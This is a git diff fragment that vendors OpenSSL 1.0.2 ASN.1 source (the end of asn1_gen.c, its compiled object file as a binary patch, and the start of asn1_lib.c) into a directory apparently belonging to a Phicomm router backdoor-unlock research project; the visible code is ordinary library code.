+        if (!append_exp(arg, tmp_tag, tmp_class, 1, 0, 0))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_SEQWRAP:
+        if (!append_exp(arg, V_ASN1_SEQUENCE, V_ASN1_UNIVERSAL, 1, 0, 1))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_SETWRAP:
+        if (!append_exp(arg, V_ASN1_SET, V_ASN1_UNIVERSAL, 1, 0, 1))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_BITWRAP:
+        if (!append_exp(arg, V_ASN1_BIT_STRING, V_ASN1_UNIVERSAL, 0, 1, 1))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_OCTWRAP:
+        if (!append_exp(arg, V_ASN1_OCTET_STRING, V_ASN1_UNIVERSAL, 0, 0, 1))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_FORMAT:
+        if (!strncmp(vstart, "ASCII", 5))
+            arg->format = ASN1_GEN_FORMAT_ASCII;
+        else if (!strncmp(vstart, "UTF8", 4))
+            arg->format = ASN1_GEN_FORMAT_UTF8;
+        else if (!strncmp(vstart, "HEX", 3))
+            arg->format = ASN1_GEN_FORMAT_HEX;
+        else if (!strncmp(vstart, "BITLIST", 3))
+            arg->format = ASN1_GEN_FORMAT_BITLIST;
+        else {
+            ASN1err(ASN1_F_ASN1_CB, ASN1_R_UNKOWN_FORMAT);
+            return -1;
+        }
+        break;
+
+    }
+
+    return 1;
+
+}
+
+static int parse_tagging(const char *vstart, int vlen, int *ptag, int *pclass)
+{
+    char erch[2];
+    long tag_num;
+    char *eptr;
+    if (!vstart)
+        return 0;
+    tag_num = strtoul(vstart, &eptr, 10);
+    /* Check we haven't gone past max length: should be impossible */
+    if (eptr && *eptr && (eptr > vstart + vlen))
+        return 0;
+    if (tag_num < 0) {
+        ASN1err(ASN1_F_PARSE_TAGGING, ASN1_R_INVALID_NUMBER);
+        return 0;
+    }
+    *ptag = tag_num;
+    /* If we have non numeric characters, parse them */
+    if (eptr)
+        vlen -= eptr - vstart;
+    else
+        vlen = 0;
+    if (vlen) {
+        switch (*eptr) {
+
+        case 'U':
+            *pclass = V_ASN1_UNIVERSAL;
+            break;
+
+        case 'A':
+            *pclass = V_ASN1_APPLICATION;
+            break;
+
+        case 'P':
+            *pclass = V_ASN1_PRIVATE;
+            break;
+
+        case 'C':
+            *pclass = V_ASN1_CONTEXT_SPECIFIC;
+            break;
+
+        default:
+            erch[0] = *eptr;
+            erch[1] = 0;
+            ASN1err(ASN1_F_PARSE_TAGGING, ASN1_R_INVALID_MODIFIER);
+            ERR_add_error_data(2, "Char=", erch);
+            return 0;
+            break;
+
+        }
+    } else
+        *pclass = V_ASN1_CONTEXT_SPECIFIC;
+
+    return 1;
+
+}
+
+/* Handle multiple types: SET and SEQUENCE */
+
+static ASN1_TYPE *asn1_multi(int utype, const char *section, X509V3_CTX *cnf)
+{
+    ASN1_TYPE *ret = NULL;
+    STACK_OF(ASN1_TYPE) *sk = NULL;
+    STACK_OF(CONF_VALUE) *sect = NULL;
+    unsigned char *der = NULL;
+    int derlen;
+    int i;
+    sk = sk_ASN1_TYPE_new_null();
+    if (!sk)
+        goto bad;
+    if (section) {
+        if (!cnf)
+            goto bad;
+        sect = X509V3_get_section(cnf, (char *)section);
+        if (!sect)
+            goto bad;
+        for (i = 0; i < sk_CONF_VALUE_num(sect); i++) {
+            ASN1_TYPE *typ =
+                ASN1_generate_v3(sk_CONF_VALUE_value(sect, i)->value, cnf);
+            if (!typ)
+                goto bad;
+            if (!sk_ASN1_TYPE_push(sk, typ))
+                goto bad;
+        }
+    }
+
+    /*
+     * Now we has a STACK of the components, convert to the correct form
+     */
+
+    if (utype == V_ASN1_SET)
+        derlen = i2d_ASN1_SET_ANY(sk, &der);
+    else
+        derlen = i2d_ASN1_SEQUENCE_ANY(sk, &der);
+
+    if (derlen < 0)
+        goto bad;
+
+    if (!(ret = ASN1_TYPE_new()))
+        goto bad;
+
+    if (!(ret->value.asn1_string = ASN1_STRING_type_new(utype)))
+        goto bad;
+
+    ret->type = utype;
+
+    ret->value.asn1_string->data = der;
+    ret->value.asn1_string->length = derlen;
+
+    der = NULL;
+
+ bad:
+
+    if (der)
+        OPENSSL_free(der);
+
+    if (sk)
+        sk_ASN1_TYPE_pop_free(sk, ASN1_TYPE_free);
+    if (sect)
+        X509V3_section_free(cnf, sect);
+
+    return ret;
+}
+
+static int append_exp(tag_exp_arg *arg, int exp_tag, int exp_class,
+                      int exp_constructed, int exp_pad, int imp_ok)
+{
+    tag_exp_type *exp_tmp;
+    /* Can only have IMPLICIT if permitted */
+    if ((arg->imp_tag != -1) && !imp_ok) {
+        ASN1err(ASN1_F_APPEND_EXP, ASN1_R_ILLEGAL_IMPLICIT_TAG);
+        return 0;
+    }
+
+    if (arg->exp_count == ASN1_FLAG_EXP_MAX) {
+        ASN1err(ASN1_F_APPEND_EXP, ASN1_R_DEPTH_EXCEEDED);
+        return 0;
+    }
+
+    exp_tmp = &arg->exp_list[arg->exp_count++];
+
+    /*
+     * If IMPLICIT set tag to implicit value then reset implicit tag since it
+     * has been used.
+     */
+    if (arg->imp_tag != -1) {
+        exp_tmp->exp_tag = arg->imp_tag;
+        exp_tmp->exp_class = arg->imp_class;
+        arg->imp_tag = -1;
+        arg->imp_class = -1;
+    } else {
+        exp_tmp->exp_tag = exp_tag;
+        exp_tmp->exp_class = exp_class;
+    }
+    exp_tmp->exp_constructed = exp_constructed;
+    exp_tmp->exp_pad = exp_pad;
+
+    return 1;
+}
+
+static int asn1_str2tag(const char *tagstr, int len)
+{
+    unsigned int i;
+    static const struct tag_name_st *tntmp, tnst[] = {
+        ASN1_GEN_STR("BOOL", V_ASN1_BOOLEAN),
+        ASN1_GEN_STR("BOOLEAN", V_ASN1_BOOLEAN),
+        ASN1_GEN_STR("NULL", V_ASN1_NULL),
+        ASN1_GEN_STR("INT", V_ASN1_INTEGER),
+        ASN1_GEN_STR("INTEGER", V_ASN1_INTEGER),
+        ASN1_GEN_STR("ENUM", V_ASN1_ENUMERATED),
+        ASN1_GEN_STR("ENUMERATED", V_ASN1_ENUMERATED),
+        ASN1_GEN_STR("OID", V_ASN1_OBJECT),
+        ASN1_GEN_STR("OBJECT", V_ASN1_OBJECT),
+        ASN1_GEN_STR("UTCTIME", V_ASN1_UTCTIME),
+        ASN1_GEN_STR("UTC", V_ASN1_UTCTIME),
+        ASN1_GEN_STR("GENERALIZEDTIME", V_ASN1_GENERALIZEDTIME),
+        ASN1_GEN_STR("GENTIME", V_ASN1_GENERALIZEDTIME),
+        ASN1_GEN_STR("OCT", V_ASN1_OCTET_STRING),
+        ASN1_GEN_STR("OCTETSTRING", V_ASN1_OCTET_STRING),
+        ASN1_GEN_STR("BITSTR", V_ASN1_BIT_STRING),
+        ASN1_GEN_STR("BITSTRING", V_ASN1_BIT_STRING),
+        ASN1_GEN_STR("UNIVERSALSTRING", V_ASN1_UNIVERSALSTRING),
+        ASN1_GEN_STR("UNIV", V_ASN1_UNIVERSALSTRING),
+        ASN1_GEN_STR("IA5", V_ASN1_IA5STRING),
+        ASN1_GEN_STR("IA5STRING", V_ASN1_IA5STRING),
+        ASN1_GEN_STR("UTF8", V_ASN1_UTF8STRING),
+        ASN1_GEN_STR("UTF8String", V_ASN1_UTF8STRING),
+        ASN1_GEN_STR("BMP", V_ASN1_BMPSTRING),
+        ASN1_GEN_STR("BMPSTRING", V_ASN1_BMPSTRING),
+        ASN1_GEN_STR("VISIBLESTRING", V_ASN1_VISIBLESTRING),
+        ASN1_GEN_STR("VISIBLE", V_ASN1_VISIBLESTRING),
+        ASN1_GEN_STR("PRINTABLESTRING", V_ASN1_PRINTABLESTRING),
+        ASN1_GEN_STR("PRINTABLE", V_ASN1_PRINTABLESTRING),
+        ASN1_GEN_STR("T61", V_ASN1_T61STRING),
+        ASN1_GEN_STR("T61STRING", V_ASN1_T61STRING),
+        ASN1_GEN_STR("TELETEXSTRING", V_ASN1_T61STRING),
+        ASN1_GEN_STR("GeneralString", V_ASN1_GENERALSTRING),
+        ASN1_GEN_STR("GENSTR", V_ASN1_GENERALSTRING),
+        ASN1_GEN_STR("NUMERIC", V_ASN1_NUMERICSTRING),
+        ASN1_GEN_STR("NUMERICSTRING", V_ASN1_NUMERICSTRING),
+
+        /* Special cases */
+        ASN1_GEN_STR("SEQUENCE", V_ASN1_SEQUENCE),
+        ASN1_GEN_STR("SEQ", V_ASN1_SEQUENCE),
+        ASN1_GEN_STR("SET", V_ASN1_SET),
+        /* type modifiers */
+        /* Explicit tag */
+        ASN1_GEN_STR("EXP", ASN1_GEN_FLAG_EXP),
+        ASN1_GEN_STR("EXPLICIT", ASN1_GEN_FLAG_EXP),
+        /* Implicit tag */
+        ASN1_GEN_STR("IMP", ASN1_GEN_FLAG_IMP),
+        ASN1_GEN_STR("IMPLICIT", ASN1_GEN_FLAG_IMP),
+        /* OCTET STRING wrapper */
+        ASN1_GEN_STR("OCTWRAP", ASN1_GEN_FLAG_OCTWRAP),
+        /* SEQUENCE wrapper */
+        ASN1_GEN_STR("SEQWRAP", ASN1_GEN_FLAG_SEQWRAP),
+        /* SET wrapper */
+        ASN1_GEN_STR("SETWRAP", ASN1_GEN_FLAG_SETWRAP),
+        /* BIT STRING wrapper */
+        ASN1_GEN_STR("BITWRAP", ASN1_GEN_FLAG_BITWRAP),
+        ASN1_GEN_STR("FORM", ASN1_GEN_FLAG_FORMAT),
+        ASN1_GEN_STR("FORMAT", ASN1_GEN_FLAG_FORMAT),
+    };
+
+    if (len == -1)
+        len = strlen(tagstr);
+
+    tntmp = tnst;
+    for (i = 0; i < sizeof(tnst) / sizeof(struct tag_name_st); i++, tntmp++) {
+        if ((len == tntmp->len) && !strncmp(tntmp->strnam, tagstr, len))
+            return tntmp->tag;
+    }
+
+    return -1;
+}
+
+static ASN1_TYPE *asn1_str2type(const char *str, int format, int utype)
+{
+    ASN1_TYPE *atmp = NULL;
+
+    CONF_VALUE vtmp;
+
+    unsigned char *rdata;
+    long rdlen;
+
+    int no_unused = 1;
+
+    if (!(atmp = ASN1_TYPE_new())) {
+        ASN1err(ASN1_F_ASN1_STR2TYPE, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!str)
+        str = "";
+
+    switch (utype) {
+
+    case V_ASN1_NULL:
+        if (str && *str) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_NULL_VALUE);
+            goto bad_form;
+        }
+        break;
+
+    case V_ASN1_BOOLEAN:
+        if (format != ASN1_GEN_FORMAT_ASCII) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_NOT_ASCII_FORMAT);
+            goto bad_form;
+        }
+        vtmp.name = NULL;
+        vtmp.section = NULL;
+        vtmp.value = (char *)str;
+        if (!X509V3_get_value_bool(&vtmp, &atmp->value.boolean)) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_BOOLEAN);
+            goto bad_str;
+        }
+        break;
+
+    case V_ASN1_INTEGER:
+    case V_ASN1_ENUMERATED:
+        if (format != ASN1_GEN_FORMAT_ASCII) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_INTEGER_NOT_ASCII_FORMAT);
+            goto bad_form;
+        }
+        if (!(atmp->value.integer = s2i_ASN1_INTEGER(NULL, (char *)str))) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_INTEGER);
+            goto bad_str;
+        }
+        break;
+
+    case V_ASN1_OBJECT:
+        if (format != ASN1_GEN_FORMAT_ASCII) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_OBJECT_NOT_ASCII_FORMAT);
+            goto bad_form;
+        }
+        if (!(atmp->value.object = OBJ_txt2obj(str, 0))) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_OBJECT);
+            goto bad_str;
+        }
+        break;
+
+    case V_ASN1_UTCTIME:
+    case V_ASN1_GENERALIZEDTIME:
+        if (format != ASN1_GEN_FORMAT_ASCII) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_TIME_NOT_ASCII_FORMAT);
+            goto bad_form;
+        }
+        if (!(atmp->value.asn1_string = ASN1_STRING_new())) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ERR_R_MALLOC_FAILURE);
+            goto bad_str;
+        }
+        if (!ASN1_STRING_set(atmp->value.asn1_string, str, -1)) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ERR_R_MALLOC_FAILURE);
+            goto bad_str;
+        }
+        atmp->value.asn1_string->type = utype;
+        if (!ASN1_TIME_check(atmp->value.asn1_string)) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_TIME_VALUE);
+            goto bad_str;
+        }
+
+        break;
+
+    case V_ASN1_BMPSTRING:
+    case V_ASN1_PRINTABLESTRING:
+    case V_ASN1_IA5STRING:
+    case V_ASN1_T61STRING:
+    case V_ASN1_UTF8STRING:
+    case V_ASN1_VISIBLESTRING:
+    case V_ASN1_UNIVERSALSTRING:
+    case V_ASN1_GENERALSTRING:
+    case V_ASN1_NUMERICSTRING:
+
+        if (format == ASN1_GEN_FORMAT_ASCII)
+            format = MBSTRING_ASC;
+        else if (format == ASN1_GEN_FORMAT_UTF8)
+            format = MBSTRING_UTF8;
+        else {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_FORMAT);
+            goto bad_form;
+        }
+
+        if (ASN1_mbstring_copy(&atmp->value.asn1_string, (unsigned char *)str,
+                               -1, format, ASN1_tag2bit(utype)) <= 0) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ERR_R_MALLOC_FAILURE);
+            goto bad_str;
+        }
+
+        break;
+
+    case V_ASN1_BIT_STRING:
+
+    case V_ASN1_OCTET_STRING:
+
+        if (!(atmp->value.asn1_string = ASN1_STRING_new())) {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ERR_R_MALLOC_FAILURE);
+            goto bad_form;
+        }
+
+        if (format == ASN1_GEN_FORMAT_HEX) {
+
+            if (!(rdata = string_to_hex((char *)str, &rdlen))) {
+                ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_HEX);
+                goto bad_str;
+            }
+
+            atmp->value.asn1_string->data = rdata;
+            atmp->value.asn1_string->length = rdlen;
+            atmp->value.asn1_string->type = utype;
+
+        } else if (format == ASN1_GEN_FORMAT_ASCII)
+            ASN1_STRING_set(atmp->value.asn1_string, str, -1);
+        else if ((format == ASN1_GEN_FORMAT_BITLIST)
+                 && (utype == V_ASN1_BIT_STRING)) {
+            if (!CONF_parse_list
+                (str, ',', 1, bitstr_cb, atmp->value.bit_string)) {
+                ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_LIST_ERROR);
+                goto bad_str;
+            }
+            no_unused = 0;
+
+        } else {
+            ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_ILLEGAL_BITSTRING_FORMAT);
+            goto bad_form;
+        }
+
+        if ((utype == V_ASN1_BIT_STRING) && no_unused) {
+            atmp->value.asn1_string->flags
+                &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+            atmp->value.asn1_string->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+        }
+
+        break;
+
+    default:
+        ASN1err(ASN1_F_ASN1_STR2TYPE, ASN1_R_UNSUPPORTED_TYPE);
+        goto bad_str;
+        break;
+    }
+
+    atmp->type = utype;
+    return atmp;
+
+ bad_str:
+    ERR_add_error_data(2, "string=", str);
+ bad_form:
+
+    ASN1_TYPE_free(atmp);
+    return NULL;
+
+}
+
+static int bitstr_cb(const char *elem, int len, void *bitstr)
+{
+    long bitnum;
+    char *eptr;
+    if (!elem)
+        return 0;
+    bitnum = strtoul(elem, &eptr, 10);
+    if (eptr && *eptr && (eptr != elem + len))
+        return 0;
+    if (bitnum < 0) {
+        ASN1err(ASN1_F_BITSTR_CB, ASN1_R_INVALID_NUMBER);
+        return 0;
+    }
+    if (!ASN1_BIT_STRING_set_bit(bitstr, bitnum, 1)) {
+        ASN1err(ASN1_F_BITSTR_CB, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.o
new file mode 100644
index 0000000000000000000000000000000000000000..27a35fa9a2459fc0d0642ffde6603046e18dfe20
GIT binary patch
literal 13064
zcmd6te{>tgoxoR?lel0cCk?>|AqXmh1Bq%m1ndw%YfJVjZ|xXc4h{{-jx3T8#}@V~
zI9x)V$^y2EAoQ-k|7hCY^?1E|kfUjVP#mQRaZ-*~7mnBK<9Zk#M`IL9uJF=8AiD2&
zc1HSo@ZP(3f8D&N-Ti*%JKy=v%y(vX*8XZpZ!U8<6p<XtZAwWJR8b!Fm7W9aF`z6^
z<|}GPFmsuj`lMhiP)FZ#Br8Myod4vZpMgq#krsR892iTTTbR7k;!gn|KLD4*m%!x|
z{1ksK-x|znj-dHCDl=P`YuhHPHOD7Gv!gomK)E@zSeuwvfRuOZ+fG!69UrUa{ne^@
z$6{?;4iqPzL!Zrco}k&{z3ZsjrAE3swbbdFJ}pyzZ4KmUX3$&h&uQs`du$qH)%+-I
zzOH2rZ^faDSpLhJ`5ALa%S5~tnt4P^ziKQRU9A}N!?BN`sN+vs!=K%c{3B|oPwu?J
zYS9ZIj{gEKr55FPsb(waylOn4nUmVGQ)<I8qyOt=YuXLZS1($l8VlAm85{G9*K{ST
zC!A1J$wwxf0le!I&K%x@hYrDw*=5x*<BtZti;f4qms$O$Wh352T6PuaK_4D2gPZ8j
zizl3;AhJ%;G8?_secH;!tQ(9uRufalYQA!}x>3FR=!fnlpQv}L>(#EX`5APZX1?BO
zemHC2ndi)31(&_o@Y+M3(fZYTw#SiNpqp>&%ide|nrgmj9t|$b=P%aHsr>Ik{&zzD
zf@=O->U<%&Kueu0_;b4X!JnVf{_@*kRxN1RIpCo3ydN&%*raAMQO~f}gc_PFlJ|x)
zx9R4ef-r8Crj7%$(94Hsp*I5{oeO3lFL|q)SzieOm<(G3@+&Yo{?BkJ4Tx^O$NC2b
z(dsW|X!<n>nsDlPm2R?X3n$&_2QkK;H7BoCU=}2OW><x7#;aP>@3_-XgSHlXLml09
zrJ}gU_Je3u_#)IbJp$sM_Z(0v^~pT<BfC*Ki!lym%Ae32CvGcDrFJU?!)+D%ITmVS
zTCL@p`Cibxpqqa@)%aPVkj}Z&w?fYJN|vpA7vfM?aSe~9F}4UYAy5})3~yD)e-f-d
z4@Ai?SJ_?2{#VDV5MTN^JRf~CKRC7eQ)qI=%2rv(_)kJ9jLZC+#ZruwBYXJ}jur1n
z^cf^2ol90ugeuX4={;~cgsPv{`2y%*pyqoHq5atvSk1Tp4+_kUC00Kk1vAoUr%n{|
zbN)B6uim3Zt@yWA3(qX8h0(6X{sZO&t`t>lr3jm!T5)I|*B}6^v~<q6WVBu}D#DI`
z*BhpiOSJUaoqWAxtHVL?u@sE3-ZdP;j>67|8}{9otj4GyjTf~s@|gmLd9g)0o6VKd
zZ1&)6=5rb1?m8ILu=y8Ojk<n(IoRcE;-1r6U;s!%$GqJDV0LDM-tLK@w~x674<0C_
zXz<XD3-833w;e|g5_j62ei>9@b?H&f<JqP&sdEnZBh7$X(}g4-ogAo-KLeLi^QXTF
zDrhzUSkW_m-Yv{v*nA0kGFbsD$8-*IV9pu$=;ph+S>XA{u&1Y>WCbh9Bd-DE-K$_0
zz)ZDbQ8zDWnUN}1N@G?HLo<)V^1~1qi4~ww{>9Y!`2cZb1Ic+TFK;c6{`b>4=>3Y3
zHPpzL%{RFisz6t+(qI`1;AUao4TGswm{rAg<;(o<Ynff%0BksX&23G;Z@4vUg%iGD
zBVoZTHd0H!?@nWX<%fcqes5o?d#r|tepNwb9QRn#uaht>*h19_<D_R{1%tWR0?+E`
z8n0q(v_cGbDygK1L;w5Jd%=d9`pn@@n=lL2!wy(Gc&k&thDCdKMbP{>Y{F9hF7HeC
zV@p62Iv}+R0ww86{nCmP_gDaIVc&X$eYl%PtsaDk_OJrDE!P-vEvtJM<0@CJ$BwcA
z(XzX|HB9-*QR5;A3h=HABM17sM!O;6^{D0qY&)qxddxpO>42UUA*HgV9@M%aC<1;f
zdd#EwIj|v_f6!u9ActUl;MGCT_LX-B8~%wo{m@d?xzSsxW)^y3?<%~c#g2wkr>n#0
zBLooh1`JIedJ8&{uU))%!X`$id#n?t3bv_M&-Qy0*ofL-!$He>K+QmSXF{;t@A6it
znN~&3bXj4lrgm3C(*PUuaZ#z&vh5DdjCgC0!!Q(%hf^<A=YIj=)}8veU|f$I-^LKk
z7I#*~dH0+L916Od&q1pLR;A_z-qQy74u)&B*ehD>wGaOed$-<S(9J$?y`=(E1Qa|p
zQr~fp?ZGJGGiurZA=^|)ox5^Jy%k5tphkRkkYWj52WH!8zYCj|mc10p;CA>m%`pkv
zp;~xF?1tlzF&$@0$qH;h0Ebg!`eIzs<96mTZjfIGWy=$Mo1DHM`kmN&9@(X!0)fgS
zKr`8_b*I~lC2^&lzIkTJ!^qx%<<oyww7yt!QL*H+sP)-}8Fd~(_CqMidljlPCvZvQ
zJ3h|Y>61_fW>RVX7;kHt-4$lEyx6h>V8UwIb6DcrSj%ArCL&DCGWXc_Vm7|xOxMy1
zVP;~5mGA=2YWpH&LMdl*6&v+pgGx@}S~GnkRH0?Mz~9CSjJ|sFu5z<1--9bbvdVH7
z+QK}{uLWA3T$MWSOhS}i^5VHdfo(HvlMyxG2%S1F+VM-Q<Tu66dm6<N$ORkj^bvSq
zm1i2OwA9oYEp-ANshWP0Wmwx2yuX&u*zxup!);76Pg!rVbSH<`czAo&$QB1J!Z-i3
zhAV8oBV2?bC@xGeZR(+lg)^#19n)}61!pleZRs7lRWW)u->RscP2sT86=|+lv{1Lw
z7>?-S&WNH68$(+MAisBbz#rWlAMnML#&zp-b_uC%N?Vt%E8(^X{z5IG4kgsq)ygiR
z4mA=AD(k}VYg`*@ih%W|NVqkGccmrN1`2xku27IMklB45=)o@(>5O!Q+gi{Oc;Yt%
zU2Wm@p^i>f=L#q*VRaS$1cFv{GQX9^)^_~yjP>EpaHAfYDJktxQA92AqO3%2^5c)|
zM?!ii66)qsOMD<c)Z5SN0r!DJZ?uLw!cF4NRXam>bcNcQLJB;<FQSCH+wrG|o5Ij>
z;3E7i0h)eihuV&s{BFt64NPuc*U_rrMTN2Xf1hBpoN?}+C&`$P@7*H7rmMgVC??dW
zGV0^GRwR6;GM1k!GWj!=(cWbwAN8s12DzH#qdt{UAAJz%VtAl3)`dDEeE}Y*jP@6c
zOt@oNDx>Zql8@!7jQW)%AKOl4EWd>0V|gm$(d}}QkL{x}`u9bWkL9V1_7_U|R7U%<
zd<D_R{-H9~zkuXpc`8?cj0ZiDuzp#_6Q4+!Uq&Jh%TpQi@iZ$E=2IE{nM3kXo-4`o
zB)Oc(I6f6b#`ZF~rKxGPr>1LDa==J>8hk5#wJZELCz<GfsIJymd*d<-Ljg!=2iu8r
zqou72=Rgh_`j1KUvE#uG#W7OlxT11i#Xe{jauHA8M8!r|RoORO74`6VBg&ALWAlM$
z%NkwPd!4Gw^KiN9s!7cWy4syrI9xSAR97`<G`g^VH25Xp#}Ycw?5cVk%Rc68ba}Gn
zAy>`bIjXDn;kiLqeQI8_tH=39nX4WMSOpExEZV{&8}6H!{sk{!Yi}9U_AvU9Di68>
zWiPPmRaQOLeH!&3UBJ#{b>D$?w_x3k#ky6jyT!GCj&owJt3EhO<uy>eo)7(cG+3&;
z#nn?5bX8k*VwPRP;^oSJ6=utKl5wZ`&f=(1ierf*Iy2#1rt!+gkgGUntdthSwF~uy
z9vfR=cuYcmgtu3?umZRPB2uI(9#9w`4&qNq1O3E~pP7OnGW)y<Y%IBolh~)FoC>a%
zpHI#iD_AMtso-ibGqo|1?if~nC+D)K-JHuc-_1E)I}mN+oUXZuHgitbN<{sfU&HRD
z%l(|+P(ti!2j^dsIEv00JDH{M*KnijokbPp2^;<c8~zVA96!g-X8&ay{+bQX1783U
zWPShSa~0U9Hv0HUZMJ%=ZTJl~yv~N-V#D#%<ZSguZ1{aPe8h%lZTNR>_>(sLpbbA^
z!(X@Ir)>CH8$K5{n%Vm2G8=xa4PRx$n{4<78-AY+-(kZaw&CBh;XkqA2Z3WeXK+D=
z#P$ogpRm!Vr=#9PB0kU;jgKUhMDNgWJPOCF&2WUWbYhznV_?|u`RnTH8{pB{o?y@Q
z%BHOboVB8$;M1FG@#4oz9bQ)A<wm@$!plu~smIIBO0-2^*Qn~zb<NFivWT*COjHSV
zbVL(LBN`tX8XUqioH3Z}XSBBud_x-T>ot0nXmr@<jctp@wrq>u+q<<Nbq8YG6L21E
z^GD&-5w*@R(c!oe1s5$2=Ri3781d+il}gjPw&tkS(*CW(hBCY@IuL&#I*{z|SGrf#
zHmqL>$3_Fn$BeCm11vka9dA2&`;&2eNF;~1C|m3LqO4AAh1#}(0_*g|C{u}SXb)i}
zmNVQzV`n1HU{lA2_Q<;Ey+iT1rNGpgh?NZ{tSs&u_lu~*c-0kKx_uLL2#j7dHkjC1
z@(E3ft}vp5o9=_wS+eyU9p3t2T;ZN<@9pm&j9J+@C|td-ZmZQ|W{h+d>zL@K!9f@e
zp(9S$aFUK1BSszAunh9n%e?`^W#!|c8b&uB+s2RbQDZQ=B|c*176)=5HaKvv7%v=a
z3$W-{;IF4v!tEa4FX0OeOTQr;{(e;CRj|HblJ$4k@UL+W(+mFkTC(#P(Z_R)sP`Gd
zuOfUk8i0g1e0vc3VZzZT!Ntda%%*&R>m&0J{T~ue`{5a4AI~qs{<B1%`aePRX}$Q>
z853sXJBzS$o^U*m3GT$gkYqov;vDVZnLy}YXQLk=`uIIl=xa9my+j}1m4yCQ8~w)#
zr~UR6;dC6&5>DgF$6x(0o7%aZ@T-YGJ%m&JQNn4x9}$l4Xrf&!_=}}nZ-{U&(T@{;
zE#bQfUrPAngkMMa_X)p-@TUmJbB*xx*Mu)4{I`T(Pxut!_^vAKd_eee!k6NK7!vja
zo+X5S9p`8p|D{6k)kOcxgs&yMmhe8psXuAL={SCmbBuF53yFFU+vraaPW}8(!u`a~
zCxq7#ejPs`VLz-S+)p^Qe-Gh!4i|p@nDAAEpSIzja*plA?^42!6F<~ILVs?8pWuyz
z-%R-TZTL9hcqSBfCJCqG{+12Dn17T*f9QBE<{bV1D`Nj@qEFY!6+|D`L$rk{LG&9y
z7JmLc;j0OMlki&zUx-E_p`UBuC+w^y{8qx(5{`SK&`%Ri?HnNdcA|fpaB6=6f8RuZ
z==w86I9;!PPPj_!=Lo0k#_NPrJ5ZD*92fj8=lc!%fl2T_&UqLX`F^g*%@_H<a(!{8
z5OzM`9QP(ng8zhbjBQMUAK_e#zu<0OuZL-u^l#zg?UnfBoYzQvFCUNP65q!;u2Gmo
zy+7mYg7~H;`0u%WoI98Vzld{;4NQW&I1eyd;tMzrO8jZgHHlx&xi0Yw+|PE2U&Hky
z5?{)Bx5TgKe51sDocBn)j`Kc=FXDl-MdFup-Y@YboF^pS$n6^vU&{4IBz`9!$6XTt
z3g@E|@8I^wBz_aO|ER=QbG}#Nw{gBt;+werzm<41*XI~cpw{0ra81WlW!;J#*D_2V
zcExXamVOhLYbCC6IUsQnH|-J^@zEpk4O~u0T#Waq#J6yHpTq~bykFuEaQT45@p~Ai
z9J`j<o8j`L#Q%oNQxg9+m(NK2$6RI|3D2TGf6BQy*9d-)a}NSYf*-R)rB>o6IS)wu
z70%lwj%OiEJre(&g_VTF-{yQ&;_q_4PvWBe`z3yX>mQK#TrTG%j{mlYX;R`IE>B6^
z%jGi?_i>pmkYEo*d=*{8c@-|4kOW`Lxkuu6a9%6%4V(ugzL|4z9z+rAO>o{L=^LCU
zB#z$&F^x)m7w7vVp5}bN#7)i*Nc<a|=Oq3;&L<`QBhIHJ{!`A+NL-w&#or514g29)
zuJ3_oOjwK;WwN~AiN8n4>$CWKM2?jz**Q{f0TGYFzWAOj#$RypT~6^0@7!+m!Y4EQ
z#KrDg#M4l`zt?BPM-0WszI6FE4G$~6p+OW--S30%YfQ;vTwvLNLDL6cZF>6^Uu<yu
z_V@tU85lI;KKOgw3ii#6%bN$1zQoXAB0gm7<Tm14;B!*%_Be0l|NZ8HqGAlFl>iss
zs-)D?rQ`|_uxkSp!gD(wsv%AB_XGU9FV-WrpK8p6v=n~G`Rf-VmafK+E3+gXCdHiP
z@Pszy@-@7?s81A-Wju?aO+0(iB+8FV6$(+@Lr@5xX{@51Q!czJ%6F_=@yf%nC<owa
zw*ITdLp`K@ykXdXI8TKCqW?O8Vf}LZN3j4T@%J}NQWTGP;P+Oz&sKk~#!~nWcNooK
z-E#dHfmnYn{Ak*TAE_YSVBLyW)Wsz31LT=y@XHIlJZ1PS$_f4uJYa~){h#CIJwlP+
zh5rJ73m(v>Tz-m|?~y8$%Rd2SXY0T26;=)Vteb-UhaoA-i}9PSZY&a5h*#)W9CS!k
o@WZ(#m&fC=JobQ;1ph<g@1=%G&0*g{XDfe-`@bKJktCP@Z*|PV?f?J)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.c
new file mode 100644
index 0000000..00733a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.c
@@ -0,0 +1,476 @@
